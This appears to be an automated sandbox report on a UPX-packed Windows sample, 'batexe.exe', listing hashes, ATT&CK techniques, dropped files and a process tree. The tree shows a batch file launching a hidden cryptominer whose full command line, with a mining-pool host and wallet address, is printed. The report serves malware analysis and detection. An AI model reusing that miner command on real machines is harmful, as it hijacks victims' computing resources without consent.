73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
303s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 15:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4076	b2e.exe
3932	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3932	cpuminer-sse2.exe
3932	cpuminer-sse2.exe
3932	cpuminer-sse2.exe
3932	cpuminer-sse2.exe
3932	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2404-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 4076	2404	batexe.exe	92
PID 2404 wrote to memory of 4076	2404	batexe.exe	92
PID 2404 wrote to memory of 4076	2404	batexe.exe	92
PID 4076 wrote to memory of 1712	4076	b2e.exe	93
PID 4076 wrote to memory of 1712	4076	b2e.exe	93
PID 4076 wrote to memory of 1712	4076	b2e.exe	93
PID 1712 wrote to memory of 3932	1712	cmd.exe	96
PID 1712 wrote to memory of 3932	1712	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Users\Admin\AppData\Local\Temp\5B2B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5B2B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5B2B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\69E0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5B2B.tmp\b2e.exe

Filesize
85KB

MD5
cf06116361ab90021b972498f31314e7

SHA1
c0d508ec239899d3ca1bc17ea87b13496367b9aa

SHA256
95063ad83f46fe985ff2317a387841d07e4619cf76f3a13523930718b9bc2b08

SHA512
5bc1d2ed78ac3f8236f5ed7b25e8f0a96535f3025c5e1219757dd5bbd4c832c83ddc87956839c56e5d98bac40689f38fd0146bb9be4be0c4c7dd8a47bdf2caf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B2B.tmp\b2e.exe

Filesize
608KB

MD5
3580e7aa16def74eb71447dddea68776

SHA1
400e10ff29b6782ae98dc15184ba303e7081f4cc

SHA256
40e19db05825b74d213c6affe62b98ff93b1d8d7dde714c25d791dc7d1bcd2bd

SHA512
7f6961c7a506b4b4f4ca6aab5f6dfc941b549bdf8e1ab0addd60531b20ad8f068e9c0cebe94ada44a9b8092a673993bd2743c75a65d63aacd31b9ffd89445d36

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B2B.tmp\b2e.exe

Filesize
745KB

MD5
4daa73229621335bc389ec4413bd43dc

SHA1
413fb6d355216ecef2c81c106effc6c80df58d0b

SHA256
c32678c20b74300e00a9273e33556fdf29c33a311c2d11e3c256dec9962ba730

SHA512
9542f0566805202c66c265e4bc66d2bf95f336c0f188d941246b88749a7aa9a2cee76aa68759f1ac1ceeb1d797eb251a18cd25d18178b345f8f1f4ff430af153

Download Submit
C:\Users\Admin\AppData\Local\Temp\69E0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
736KB

MD5
c7a8e6c8e43f7caed191f49157044369

SHA1
3a12240f5361dd9d42a6b8744dd4876a0ff9232a

SHA256
99e06021350d618beaf23b194bef66c53d909585132a0b99d4308f9f16cc1dba

SHA512
042cdc92b0ec4a02258342ee8e94c0689f6b7079eef881806c581a16e999d0391ce5d7bafc9e64b6f5fe0ace1027399eb3c548a6abc3aa67f20cd4d0c33c7396

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
525KB

MD5
a248333af9a07cce41d046d63194120b

SHA1
2aab3857e958bc39422c34ed364866abb8607eb6

SHA256
960af1e6cc84a0eb9c4ab2c4e370ee3153584a82a3657063a5a226b9746e2dc7

SHA512
3ad71132d179d8a4c849bfe5aa10e4e7b8f519e4c47f13abc89f688b5817cba0607047612dc5303e662fecfa0b4c2761cc7895760bbf874a542a0778e89abec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
546KB

MD5
48dfc34e64f4320163b1819a750c25c6

SHA1
224ce49b96100aa738bd71f9132759f6380fc696

SHA256
d9d131b2c5c32abd5547a57035b2ecae57f6e73bdf98004ba681def399b6164a

SHA512
2baab394627ef041eb0a242d5c2e40b893829189a4618a8fd9ca27da96278a3914f6f1a410600e3c85e61dde1ecd16adbac25158681d8292d748d4abd3dc34dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
523KB

MD5
1338e046d79f533f8810ce2d60971ee1

SHA1
9dc3fa885fd7ea9debd6a4d0167dc99a7e521b91

SHA256
7f8e43efc04c1094854576e0aae636254148cf2895f6958341d4040df73442a0

SHA512
6c5040329e59e78d07e0a5712768146248608bdd8da428e7bf4e0d6669bb9eb8af2f5e4d9fd9bed39358386fd899d262ae3e9b8ec4ebdf005f6789099470cb21

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
424KB

MD5
4688c159d43863b88ed10f3c1355c3cf

SHA1
5ad6dbb2bea462cb4ad30a2c9e6e65194c52d30c

SHA256
890b553d2f48d2d2e25f2b99bbef7cd317c47a221ebe12bc22c489bf80d3e268

SHA512
bf4729edea00734bea7c461b573273d348f90797e3988890aea415e85822d81c7cdc39bb64abc68450cdaacf10754e6150d3f3554e3f408c24595f483f5dad5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
522KB

MD5
9921a5b482573f595b6bee8e41ef32d9

SHA1
08f05405e2c98bcceff8195c4f06dfc694ef3f5d

SHA256
ab51f3d4108845d81fb4ffdaf3fa794da28e6440e1003698f39e67450734af65

SHA512
6f689cf715e1c9e25f7fdc9e28af15b6da544e63d55c83c3320c9800dd460569090dd40f20376a5c690c0b3d4e2a7e96618c9d9a50cc365746114a59f24565a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
396KB

MD5
a5dbeaab9ab49f7445932df77b02aba4

SHA1
082e992c90a6bbb0c9c638d01dd9e737471285bd

SHA256
42e076307a5cb0308982be75a9db197c83eab30913f838cf161f9272bd68df6a

SHA512
74137cd4ec5a9a3c9b2a28f6095e404db2b0982108687779b9d48c4cc0aef99e392d29338c96b6d5478f4a7c56f4819d2d55f2b3a0eac4a814fa2cd8ab8446b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
727KB

MD5
186667507adc0a522de5692c289c7a82

SHA1
432e8484bda9b8e337d5658ae1f58c6e9cb14707

SHA256
9597748aa64c890a3909125780047d9e56a190a7f21551958381512d7caa94ae

SHA512
998faf59dffe86df4e4dffbd081998f71c29043360fb3e37ff7ad052a6b8ee87a0e32d97855d2e48bcd6eae5c10313c7b79e1bf68ea3f80503a51b1af822abc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
692KB

MD5
91c8109992d191251acda241048c9d57

SHA1
11ba8a7e5d712d152354e6ff2b7f1632e5bb52d2

SHA256
69c120cc4613d7bd16befcd75c130fe407430b3e286a91197dce28202731f8d7

SHA512
7fd0cdcd4e0cc93ebc96f5741651d81533d45feef451812e874e2370eca1f13f8633c03db867e17bec3dbeee42265740bfcdbc901f2780e1946cf0b2a9fc6678

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
320KB

MD5
2e7ec79acb50b466cb9e43be9b93ced9

SHA1
e9d87a6fdd13f964ff39dc97fb3b42d5d1ed5645

SHA256
65ec04ae03f1d35f0ad839b71cc102d718332187d3dbf70d89bae23cc7efe566

SHA512
5ef480ce781e8d81ccab0f0a2b19181e17f78633872d1d7912e10498d0fb5c11ad0ea1a4dba3678ef231cb186a4f01edc3e6033be7509b2216bcaf27850a4f42

Download Submit
memory/2404-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3932-45-0x000000005EFE0000-0x000000005F078000-memory.dmp

Filesize
608KB

Download
memory/3932-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3932-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3932-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-47-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/3932-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3932-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4076-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download